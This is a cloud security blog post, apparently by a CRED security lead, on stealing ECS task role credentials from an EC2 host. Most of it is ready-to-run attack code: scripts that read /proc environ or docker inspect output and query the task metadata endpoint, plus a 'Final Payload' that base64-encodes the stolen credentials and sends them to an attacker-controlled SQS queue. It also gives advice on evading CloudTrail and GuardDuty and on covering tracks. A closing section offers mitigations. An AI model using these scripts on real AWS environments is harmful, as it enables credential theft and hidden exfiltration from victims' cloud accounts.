A Fresh Perspective on Exfiltrating ECS Task Metadata Credentials

Introduction

In the cloud-native landscape, Amazon ECS (Elastic Container Service) has become a popular choice for deploying and managing containerised applications at scale. However, with the convenience of ECS come potential security vulnerabilities that can be exploited if not properly understood and secured. One such vulnerability revolves around the default settings of EC2 instances and the IAM Task Roles assigned to ECS tasks, and how attackers can potentially exploit these roles to gain unauthorized access to sensitive AWS resources.

This blog will deep dive into a specific attack vector targeting ECS Task Metadata Service (TMDS) credentials. We will explore how an attacker with access to the host EC2 instance can extract these credentials and exfiltrate them to an external, attacker-controlled environment.

Attack Objective

The main goal of this attack is to compromise the IAM credentials for all the IAM Task Roles assigned to the ECS Services, Tasks, and Scheduled Tasks running on an EC2 instance. This technique can potentially be used to dump all the environment variables as well, which might contain IAM Access Keys and Secret Keys, or sensitive API keys that are required for an application to run. In this blog we will only be covering how to exfiltrate "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI".

  1. Understanding ECS and IAM Task Roles: We'll start with an overview of how ECS works, particularly focusing on how IAM Task Roles are used to grant permissions to containers running within ECS tasks.

  2. Exploiting the Task Metadata Service: We’ll demonstrate how an attacker can leverage the /proc filesystem on the host to extract environment variables, including the AWS_CONTAINER_CREDENTIALS_RELATIVE_URI, which is critical for accessing IAM credentials.

  3. Credential Exfiltration Techniques: With the credentials in hand, we’ll explore different methods for exfiltrating these credentials to an attacker-controlled environment, such as sending them to an SQS queue in the attacker’s AWS account.

  4. Mitigation Strategies: Finally, we’ll discuss proactive measures and best practices to mitigate these risks, ensuring your ECS workloads remain secure.

By the end of this blog, you'll have a clear understanding of the potential risks associated with ECS Task Metadata Service and practical steps to protect your cloud infrastructure from such exploits.

Pre-Requisites

To test out this hypothesis, keep the following scenarios in mind:

  • You need to have access to the EC2 instance, via one of the following:

    • SSH - Public Key or Password Auth

    • ssm:StartSession - If you can directly connect to the EC2 instance via SSM Fleet Manager

    • ssm:SendCommand, ssm:StartAutomationExecution - These can be used with SSM Documents, where an attacker crafts a malicious SSM Document and runs it on the target EC2 instance (see the sketch after this list)

    • EC2 Instance Connect

    • EC2 Serial Console

  • In this blog, we are going to use the standard deployment mode for ECS, in which

    • EC2-based infrastructure running on Amazon Linux 2

    • Linux users with standard sudo/docker access - ec2-user, ssm-user; though we'll explore another method without sudo access ;)
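
For instance, with ssm:SendCommand an attacker can run arbitrary shell commands on the target instance without any SSH access. A minimal sketch, assuming the attacker holds that permission (the instance ID is a placeholder):

# Run an arbitrary command on the target instance via SSM Run Command.
aws ssm send-command \
    --instance-ids "i-0123456789abcdef0" \
    --document-name "AWS-RunShellScript" \
    --parameters 'commands=["id"]'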

How ECS Works and Fetches Task Metadata Service Credentials

When organizations want to run a containerised task or a microservice, they usually utilise the AWS managed service ECS (Elastic Container Service). ECS is responsible for orchestrating and managing containerised applications across a cluster, which can run either on EC2 or on AWS Fargate.

ECS internally uses the ECS Agent on each EC2 instance, which runs as a sidecar on the ECS cluster and handles communication between the EC2 instance and the ECS control plane, also known as the Amazon Container Service (ACS). This agent is responsible for sharing critical information related to running a task, like:

  • Cluster ARN

  • Task ID

  • IAM Task Role

  • Task Metadata
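
You can see some of this metadata first-hand from inside a running task. A quick sketch, assuming a recent ECS Agent that injects the v4 metadata endpoint variable into the task:

# Inside a running ECS task: the agent injects ECS_CONTAINER_METADATA_URI_V4,
# which serves task metadata such as the cluster and task ARNs.
curl --silent "${ECS_CONTAINER_METADATA_URI_V4}/task" | jq '{Cluster, TaskARN}'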

Let's understand how containers work

Before we deep dive into the attack methodology, I would like to quickly walk you all through some basics of how containers work. Whenever a container is running on a host, its processes are visible on the host as regular processes in the host's PID namespace.

So, assuming there is a container running on my system, I can simply do ps -eF --forest

You can notice that there is a container running nginx with a PID of 3249575. You can also get the same information if you use docker inspect -f "{{.State.Pid}}" {containerID}
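
For example, a hypothetical invocation (the container ID is illustrative) would look like:

docker inspect -f "{{.State.Pid}}" 3f1c2a9b71de
# 3249575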

Now that we have the PID of the running container, let's quickly understand the use case of the /proc filesystem as well.

The /proc filesystem is a virtual filesystem that provides an interface to kernel data structures. It doesn't contain real files but rather runtime system information (e.g., processes, memory, mounted devices). Each running process, including those inside containers, has a corresponding directory under /proc named after its PID. This directory contains various files that provide detailed information about the process.

In practical terms, this means that if your current Linux user has the right set of privileges, you can potentially read the /root, /home, and /proc directories of running containers directly from the host.

Navigating to the /proc/3249575/ directory on my host, I can see all the relevant information related to this container. For example, I can check the namespaces for the running container.
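
Using the PID from above, the ns directory lists the namespaces the container's process belongs to:

sudo ls -l /proc/3249575/ns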

Now, the interesting thing here is that we can also read the environment variables of a running ECS Task. For example, if I am running an ECS Task, the ECS Agent is usually running as a sidecar in the cluster. So let's read the environ file for the ECS Agent.
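
Since environ stores variables as null-separated strings, translating the null bytes to newlines makes the output readable (the PID is from the example above):

sudo sh -c "tr '\0' '\n' < /proc/3249575/environ"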

Understanding Task Metadata Service

Reading env variables is not that big a hassle and is quite straightforward; you can get the same data using docker inspect -f "{{.Config.Env}}" {containerID}. But the catch lies in how the metadata service is utilised with ECS.

ECS utilises a different metadata service than the IMDS we are usually aware of (i.e. http://169.254.169.254/), known as the Task Metadata Service (TMDS). You can read more about TMDS here.

A TL;DR for TMDS would be: when you create ECS tasks, you can assign a Task Role (IAM Role) to each task so that it is able to interact with AWS resources like S3, DynamoDB, etc. The credentials endpoint path is stored in the environment variable AWS_CONTAINER_CREDENTIALS_RELATIVE_URI of a running task, and the endpoint IP (169.254.170.2) is always constant. A typical value of this variable would be something like

AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/ec11111d-1af2-1337-8e3a-2137f1111555

Hence a typical way for AWS SDKs to authenticate to AWS would be via the following endpoint.

curl --silent http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI

which would grant STS credentials to the running application on that task.
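
The response is a standard set of temporary STS credentials. A representative payload (all values are redacted placeholders) looks like:

{
  "RoleArn": "arn:aws:iam::{accountID}:role/{taskRoleName}",
  "AccessKeyId": "ASIA...",
  "SecretAccessKey": "...",
  "Token": "...",
  "Expiration": "2024-01-01T00:00:00Z"
}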

Weaponising ENV Variables and standard access to host

We explored two different methods to read environment variables from running containers:

  • Using sudo cat /proc/{PID}/environ

  • Using docker inspect {containerID} | jq '.[0].Config.Env'

But what if, as an attacker, I write a simple bash script to enumerate all running containers and extract environment variables from each one?

#!/bin/bash

# Enumerate all running containers, resolve each one's host PID, then read the
# task's AWS_CONTAINER_CREDENTIALS_RELATIVE_URI from /proc/<pid>/environ and
# fetch the credentials from the TMDS endpoint.
for container in $(docker ps -q); do
    echo "[+]Container: $container"
    pid=$(docker inspect -f "{{.State.Pid}}" "$container")
    sudo sh -c "tr '\0' '\n' < /proc/$pid/environ | grep 'AWS_CONTAINER_CREDENTIALS_RELATIVE_URI' | cut -d'=' -f2 | xargs -I {} curl http://169.254.170.2{} --silent | jq ."
    echo ""
done

If you notice, we're running this script with sudo access, which is granted by default to the ec2-user on EC2 instances. This script is executed directly on the host, without running any commands inside the containers themselves.

Quoting what the AWS documentation says about standard sudo access:

By default, password authentication and root login are disabled, and sudo is enabled. To log in to your instance, you must use a key pair.

This design allows users to easily log in and troubleshoot the instance, but it also means that sudo access is typically granted without giving you the option to restrict it for the ec2-user or other Linux users. While this can be seen as a design limitation, it is not necessarily a security concern if you properly manage your Linux users and instance configurations.

You might use this script if you suspect that docker CLI commands are being monitored by an Endpoint Detection and Response (EDR) or runtime monitoring tool on the EC2 instance—something that is common in many environments. For example, AWS GuardDuty Runtime Monitoring would typically detect commands like docker inspect or docker exec.

However, if you are willing to take the risk of detection or if you don't have sudo access but your current user does have docker access, you can use an alternative version of this script that bypasses the need for sudo altogether.

#!/bin/bash

# Same enumeration via `docker inspect` alone - no sudo needed, as long as the
# current user can talk to the Docker daemon (e.g. is in the docker group).
for container in $(docker ps -q); do
    echo "[+]Container: $container"
    docker inspect "$container" | jq '.[0].Config.Env' | grep "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" | cut -d"=" -f2 | tr -d '",' | xargs -I {} curl http://169.254.170.2{} --silent | jq .
done

Data Exfiltration - Covering tracks via cloud

Now that we have credentials, how can we effectively exfiltrate them to an attacker-controlled environment? Here are a few methods to consider:

  1. Base64 Encode and Send to a C2 Server: While this is a common method, using a Command and Control (C2) server is risky. C2 servers are often flagged by security systems, which could jeopardise the entire operation.

  2. Base64 Encode and Send to an SQS Queue: Sending the encoded payload to an attacker-controlled SQS queue is another option. However, if the EC2 instance profile lacks sqs:SendMessage permissions, the attempt will fail, resulting in an access denied entry in CloudTrail, increasing the likelihood of detection.

  3. Base64 Encode and Use Attacker-Controlled IAM Credentials: This approach involves encoding the payload and using IAM credentials from the attacker's environment to send the data. This method deserves a deeper discussion as it minimizes the risk of detection by avoiding access denied errors in the victim's CloudTrail.

If we create an IAM user in the attacker's controlled AWS environment and grant that user permission to sqs:SendMessage to an attacker-controlled SQS queue, all the related API activity—whether it’s sending messages or encountering access denied errors—would be logged in the attacker's environment, not the victim's. This approach provides several advantages for data exfiltration:

  1. CloudTrail Analysis: The victim's CloudTrail will not log any sqs:SendMessage activities, making it difficult for the victim to detect the exfiltration.

  2. Access Denied Logs: Any access denied errors would be recorded in the attacker's CloudTrail, not the victim's, further reducing the chances of detection on the victim's side.

  3. Legitimate-Looking Traffic: Communication between the victim's environment and the attacker's environment would occur over SQS, which might appear as legitimate traffic, making it less likely to be flagged as suspicious.

By using this method, an attacker can exfiltrate data without triggering alarms in the victim's AWS account, and then safely purge the IAM access keys from the victim’s environment to cover their tracks.

  1. Create SQS Queue in Attacker-Controlled Environment:

    Use the following AWS CLI command to create an SQS queue:

aws sqs create-queue --queue-name {queueName}
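
The command returns the queue URL, which the final payload will need. The output looks like this (region, account ID, and queue name are placeholders):

{
    "QueueUrl": "https://sqs.{region}.amazonaws.com/{accountID}/{queueName}"
}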

  2. Set Up AWS Lambda with Required Permissions:

    To allow the Lambda function to interact with SQS, ensure it has the following permissions:

{
    "Effect": "Allow",
    "Action": [
        "sqs:ReceiveMessage",
        "sqs:DeleteMessage",
        "sqs:GetQueueAttributes"
    ],
    "Resource": "{queueARN}"
}

  3. Use This Code to Base64 Decode Incoming Messages in AWS Lambda, and attach SQS as a trigger for this function.

import json
import base64 

def lambda_handler(event, context):
    for record in event['Records']:
        # Extract the base64 encoded message from the SQS message body
        encoded_message = record['body']
 
        # Decode the base64 encoded message
        decoded_message = base64.b64decode(encoded_message).decode('utf-8')
        
        # Print the clean text
        print("Decoded message:", decoded_message)

  4. Create an IAM User with Specific Permissions:

    Create an IAM user and generate IAM Access Key and Secret Key for this user with the following permissions, which will be used to authenticate in the victim's environment:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": "sqs:SendMessage",
            "Resource": "arn:aws:sqs:{region}:{accountID}:{queueName}"
        }
    ]
}
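
For reference, creating this user and its access keys from the CLI could look like the following (the user and policy names are illustrative, and the policy above is assumed to be saved as policy.json):

# Create the exfiltration user, attach the send-only policy, and mint keys.
aws iam create-user --user-name exfil-user
aws iam put-user-policy --user-name exfil-user \
    --policy-name sqs-send-only \
    --policy-document file://policy.json
aws iam create-access-key --user-name exfil-user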

Attacker-Controlled Environment Setup Summary:

  • SQS Queue: A queue is created to receive exfiltrated data.

  • IAM User: An IAM user with access keys is created with the necessary permissions to send messages to the SQS queue.

  • Lambda Function: A Lambda function is deployed to poll the SQS queue, decode incoming messages, and potentially store the data in S3 or DynamoDB for further analysis.

Final Payload

Before you copy the code and run it, let's first discuss what's happening in this script. Notice that we need to provide an IAM Access Key, Secret Key, Region, and SQS Queue URL—all of which are controlled by the attacker.

In this script, the IAM credentials are exported to the environment variables of the running EC2 instance. These environment variables take precedence over the instance profile when using the AWS CLI or SDK, allowing the script to operate under the attacker's IAM credentials.
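
As a quick illustration of this precedence (the keys are placeholders), once the attacker's keys are exported, identity checks resolve to the attacker's IAM user instead of the instance profile:

export AWS_ACCESS_KEY_ID="AKIA..."      # attacker's access key (placeholder)
export AWS_SECRET_ACCESS_KEY="..."      # attacker's secret key (placeholder)
aws sts get-caller-identity             # now returns the attacker's IAM user ARN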

After the exfiltration process is completed, the script simply removes these credentials from the environment variables to clean up any traces.

#!/bin/bash

# Usage: ./exfil.sh <access_key> <secret_key> <region> <sqs_queue_url>


ACCESS_KEY="$1"
SECRET_KEY="$2"
REGION="$3"
SQS_QUEUE_URL="$4"

# Validate that all arguments are provided
if [ -z "$ACCESS_KEY" ] || [ -z "$SECRET_KEY" ] || [ -z "$REGION" ] || [ -z "$SQS_QUEUE_URL" ]; then
    echo "Usage: $0 <access_key> <secret_key> <region> <sqs_queue_url>"
    exit 1
fi

# Set up AWS CLI with the provided access keys
export AWS_ACCESS_KEY_ID="$ACCESS_KEY"
export AWS_SECRET_ACCESS_KEY="$SECRET_KEY"
export AWS_DEFAULT_REGION="$REGION"

# Enumerate Docker containers and extract credentials
for container in $(docker ps -q); do
    echo "[+]Container: $container"
    pid=$(docker inspect -f "{{.State.Pid}}" $container)

    # Extract the AWS_CONTAINER_CREDENTIALS_RELATIVE_URI and fetch credentials
    credentials=$(sudo sh -c "tr '\0' '\n' < /proc/$pid/environ | grep 'AWS_CONTAINER_CREDENTIALS_RELATIVE_URI' | cut -d'=' -f2 | xargs -I {} curl http://169.254.170.2{} --silent | jq .")
    
    # Check if credentials were found
    if [ -n "$credentials" ]; then
        # Base64 encode the credentials
        encoded_credentials=$(echo "$credentials" | base64 -w 0)
        # Send the encoded credentials to the SQS queue
        aws sqs send-message --queue-url "$SQS_QUEUE_URL" --message-body "$encoded_credentials"
        if [ $? -eq 0 ]; then
            echo "Credentials for container $container successfully sent to SQS queue."
        else
            echo "Failed to send credentials for container $container to SQS queue."
        fi
    else
        echo "No AWS credentials found for container $container."
    fi
    echo ""
done

# Unset AWS credentials to avoid leaving them in the environment
unset AWS_ACCESS_KEY_ID
unset AWS_SECRET_ACCESS_KEY
unset AWS_DEFAULT_REGION

Mitigation and Detection

We have demonstrated how to perform data exfiltration by abusing generic ECS behaviour; now, how do we securely configure our ECS infrastructure?

  • Restrict IAM Permissions for ECS Task Roles

    • Least Privilege Principle: Ensure that ECS Task Roles have the minimum necessary permissions required to perform their tasks. Avoid assigning broad permissions like AdministratorAccess to ECS Task Roles. Instead, use fine-grained policies that limit access to only the required AWS services and resources.

    • IAM Condition Keys: Leverage IAM condition keys to restrict the use of credentials, such as limiting actions based on source IP address, VPC ID, etc. This can prevent stolen credentials from being used outside the intended context (see the sketch after this list).

  • Enable GuardDuty Runtime Monitoring: AWS GuardDuty's Runtime Monitoring for ECS is a powerful tool for detecting suspicious activity. Enable this feature to monitor for potentially malicious actions, such as running unauthorized commands within containers or accessing sensitive credentials. Use GuardDuty findings as part of your incident response process to quickly isolate and investigate compromised containers.

  • Remove or Restrict Sudo Access: The ability to execute commands with sudo can be a significant risk, as demonstrated in the attack scenario. Restrict sudo access to only those users who absolutely need it and consider using IAM roles with strict permissions instead. Implement IAM policies that limit the use of ssm:StartSession, ssm:SendCommand, and ssm:StartAutomationExecution to trusted users and automate the process of auditing these permissions regularly.

  • Immutable Infrastructure Practices: Adopt an immutable infrastructure approach where EC2 instances are not accessed or modified after deployment. Any instance requiring changes should be redeployed from a new image rather than updated in place. This limits the exposure time for potential security breaches.
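
As a sketch of the condition-key approach (the role name and VPC ID are placeholders, and note that aws:SourceVpc only evaluates for requests that traverse a VPC endpoint), an inline deny policy on the task role could look like:

# Deny use of the task role's credentials from outside the expected VPC.
aws iam put-role-policy \
    --role-name {taskRoleName} \
    --policy-name deny-outside-vpc \
    --policy-document '{
        "Version": "2012-10-17",
        "Statement": [{
            "Sid": "DenyOutsideVpc",
            "Effect": "Deny",
            "Action": "*",
            "Resource": "*",
            "Condition": {"StringNotEquals": {"aws:SourceVpc": "vpc-0123456789abcdef0"}}
        }]
    }'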

Notes

We discussed the fundamentals of how containers operate and their interaction with the host system. While Amazon ECS enables organizations to efficiently scale their infrastructure and manage operational tasks, it's crucial to understand how ECS functions internally. Awareness of how default settings on ECS and EC2 instances can be exploited to potentially exfiltrate and misuse IAM credentials is essential. If you've made it this far and you're impressed with CRED's security ecosystem and research on AWS Infrastructure, we'd love to hear from you! We're hiring!

Saransh Rana

Team Lead - Cloud Security@CRED
